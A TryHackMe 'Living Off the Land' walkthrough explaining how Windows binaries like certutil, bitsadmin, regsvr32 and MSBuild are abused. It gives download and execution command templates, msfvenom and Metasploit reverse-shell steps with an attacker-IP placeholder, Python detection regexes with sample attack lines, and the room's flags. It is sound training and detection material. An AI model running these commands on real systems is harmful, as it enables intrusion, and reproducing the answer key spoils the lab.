We covered Living Off The Land Binaries that are frequently used in red team engagements. Living Off The Land Binaries are applications and executables that come pre-installed with the operating system. An example is bitsadmin.exe on Windows and ping on Linux. The LOLBAS project catalogues the Windows binaries that are categorized as living off the land, and GTFOBins is its equivalent for Linux operating systems. This was part of the solution walkthrough of the TryHackMe Living Off the Land room.

What is Living Off The Land?

The term “Living Off The Land” originates from survival scenarios where one uses available resources to survive. In the context of cybersecurity, particularly for red teams, it means using the native tools already present on a compromised target machine (whether Windows or Linux) to achieve objectives. The primary goal of this approach is to evade security defenses and avoid triggering alarms that might occur if custom or foreign tools were downloaded onto the system.

Why Use LOTL Techniques?

LOTL techniques are favored for several reasons:

  • Evade Detection: Using native binaries is significantly less likely to raise suspicion compared to introducing foreign tools, making it harder for security teams to detect malicious activity.
  • Bypass Security: This approach can help bypass various security measures, including application whitelisting, which typically prevents unauthorized executables from running.
  • Perform Various Actions: LOTL binaries are versatile and can be used for a wide range of activities, such as reconnaissance, file operations (downloading, uploading), lateral movement within a network, and even code execution.

Resources for Finding LOTL Binaries

I learned about two key resources for identifying legitimate binaries that can be abused for LOTL purposes:

  • LOLBAS (Living Off The Land Binaries and Scripts): This is a project that meticulously documents Windows binaries, scripts, and libraries that can be used for LOTL purposes. Binaries are categorized by MITRE ATT&CK techniques, their function (e.g., download, execute), and type. I can search by function (e.g., /download, /execute), binary name, or even a specific ATT&CK technique ID.
  • GTFOBins: This is the Linux equivalent of LOLBAS, similarly categorizing binaries by their potential function (e.g., file download).

Demonstrated LOTL Binaries and Techniques (Windows)

The video provided practical demonstrations of several Windows LOTL binaries:

  1. certutil.exe:
    • Originally designed for managing certification services, attackers abuse it to download files/payloads.
    • Conceptual command: certutil -urlcache -split -f <URL_to_payload> <local_path_to_save>
  2. bitsadmin.exe:
    • Manages the Background Intelligent Transfer Service (BITS). Attackers use it to download files.
    • Conceptual command: bitsadmin /transfer /download /priority foreground <URL_to_payload> <local_path_to_save>
    • A demonstration showed downloading a payload.txt file.
  3. explorer.exe:
    • The native Windows file explorer. It can be used to execute commands or payloads.
    • Conceptual command: explorer.exe /root,<path_to_executable>
    • Demonstrated by launching calc.exe.
  4. rundll32.exe:
    • Used to run functions from DLLs. It can execute commands/payloads using JavaScript. The video noted that this method might be detected by security software like Windows Defender.
  5. regsvr32.exe / regsvr64.exe:
    • Used to register and unregister DLLs. This can be abused to bypass application whitelisting.
    • Demonstration Steps:
      • A DLL payload was generated using msfvenom.
      • The DLL was downloaded to the target using bitsadmin.
      • A listener was set up using Metasploit (msfconsole).
      • regsvr32.exe was then used to execute the downloaded DLL, which established a reverse shell back to the attacker’s listener.
    • Conceptual command for msfvenom (to generate payload): msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<port> -f dll > payload.dll
    • Conceptual commands for msfconsole (listener), entered one per line:
      use exploit/multi/handler
      set PAYLOAD windows/meterpreter/reverse_tcp
      set LHOST <attacker_IP>
      set LPORT <port>
      exploit
    • Conceptual command for regsvr32.exe: regsvr32.exe /s /i:<URL_to_DLL> scrobj.dll (if hosted remotely) or regsvr32.exe /s /i:"C:\path\to\payload.dll" scrobj.dll (if local)
  6. MSBuild.exe:
    • A native platform for building Windows applications. It can be used to execute PowerShell scripts remotely without directly spawning powershell.exe. This requires converting the PowerShell script (.ps1) into a C# project file (.csproj).
    • The tool “PowerLessShell” (or “No PowerShell”) is used for this conversion.
    • Demonstration Steps:
      • A malicious PowerShell script was generated with msfvenom.
      • The .ps1 script was downloaded to the target (though the video mentioned it should ideally be converted first on the attacker machine).
      • PowerLessShell (a Python script) converted the .ps1 to a .csproj file on the attacker’s machine.
      • The .csproj file (presumably transferred to the target, though this final transfer step wasn’t explicitly shown) was executed using MSBuild.exe, aiming to get a reverse shell.
    • Conceptual command for PowerLessShell (on attacker machine): python powerlessshell.py -f <path_to_ps1_script> -o <output_csproj_file>
    • Conceptual command for MSBuild.exe (on target machine): C:\Windows\Microsoft.NET\Framework\<version>\MSBuild.exe C:\path\to\payload.csproj
    • The path to MSBuild.exe is typically under C:\Windows\Microsoft.NET\Framework\<version>\.
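From the defender's side, the six binaries above leave recognisable command lines in process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 with command-line auditing). The following Python triage is an added example, not code from the TryHackMe room or the video: the sample command lines, the rule names and the 203.0.113.10 host are constructed, and the ATT&CK IDs other than MSBuild's T1127.001 (quoted from the room) are the MITRE mappings as known to the author of this example.

```python
import re

# Constructed sample process-creation command lines (Sysmon Event ID 1 style).
# Each abused form is paired with a benign use of the same binary so the
# rules can be checked for false positives. None of these come from the page.
SAMPLE_COMMAND_LINES = [
    r'certutil -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\thm\payload.txt',
    r'certutil -verify C:\certs\server.cer',
    r'bitsadmin /transfer job1 /download /priority foreground http://203.0.113.10/payload.txt C:\Users\thm\payload.txt',
    r'explorer.exe /root,C:\Windows\System32\calc.exe',
    r'explorer.exe C:\Users\thm\Documents',
    r'regsvr32.exe /s /i:http://203.0.113.10/payload.sct scrobj.dll',
    r'regsvr32.exe /s C:\Program Files\Vendor\vendor.dll',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\thm\payload.csproj',
    r'rundll32.exe javascript:"<constructed, truncated sample>"',
]

# (rule name, ATT&CK ID, pattern). Patterns key on the argument that only the
# abused form needs, so ordinary use of the same binary does not fire.
RULES = [
    ("certutil download", "T1105", re.compile(r"\bcertutil(\.exe)?\b.*\s-urlcache\b", re.I)),
    ("bitsadmin download", "T1197", re.compile(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", re.I)),
    ("explorer /root launch", "T1218", re.compile(r"\bexplorer(\.exe)?\s+/root,", re.I)),
    ("regsvr32 scriptlet", "T1218.010", re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:.*\bscrobj\.dll", re.I)),
    ("rundll32 javascript", "T1218.011", re.compile(r"\brundll32(\.exe)?\b.*\bjavascript:", re.I)),
    ("msbuild project", "T1127.001", re.compile(r"\bmsbuild(\.exe)?\b.*\.csproj\b", re.I)),
]


def triage(command_lines):
    """Return one (rule_name, attack_id, command_line) tuple per matching rule.

    A line that matches no rule produces nothing, so benign certutil/explorer/
    regsvr32 invocations fall through silently.
    """
    hits = []
    for cmd in command_lines:
        for name, attack_id, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, attack_id, cmd))
    return hits


if __name__ == "__main__":
    for name, attack_id, cmd in triage(SAMPLE_COMMAND_LINES):
        print(f"[{attack_id}] {name}: {cmd}")
```

The rules are intentionally narrow on the switch each technique needs (-urlcache, /transfer, /root, /i: with scrobj.dll, javascript:, a .csproj argument); broadening them to the bare binary name would flag every legitimate certificate or BITS operation on the host.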

Additional resources

  • GTFOBins – The Linux version of the LOLBAS project.
  • Astaroth: Banking Trojan – A real-life malware analysis showcasing how this malware uses Living Off the Land techniques.

Room Answers

Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?

Pktmon.exe

Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?

T1127.001

Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?

Execute

Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?

enc_thm_0YmFiOG_file.txt

Use the certutil.exe tool to decode the encoded flag file from question #1. In order to decode the file, we use the -decode option as follows:

C:\Users\thm> certutil -decode Encoded_file payload.txt

THM{ea4e2b9f362320d098635d4bab8a568e}

Replicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?

THM{23005dc4369a0eef728aa39ff8cc3be2}

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.